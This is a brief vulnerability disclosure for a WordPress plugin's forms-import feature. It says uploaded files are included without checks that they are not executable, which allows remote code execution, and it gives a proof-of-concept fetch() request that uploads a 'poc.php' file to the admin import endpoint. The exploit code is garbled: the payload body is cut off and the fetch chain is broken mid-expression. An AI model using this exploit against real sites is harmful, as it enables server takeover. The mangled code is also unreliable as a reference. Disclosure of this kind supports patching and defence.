The plugin includes uploaded files without adequately ensuring that they are not executable, leading to a remote code execution vulnerability.
fetch(“/wp-admin/admin.php?action=jet_engine_forms_import”, { “headers”: { “accept”: “text/html”, “content-type”: “multipart/form-data; boundary=----WebKitFormBoundary5hcKRhxO2OVXJm3s” }, “body”: "------WebKitFormBoundary5hcKRhxO2OVXJm3s\r\nContent-Disposition: form-data; name="form_file"; filename="poc.php"\r\nContent-Type: application/json\r\n\r\n response.text()).then((data) => console.log(data));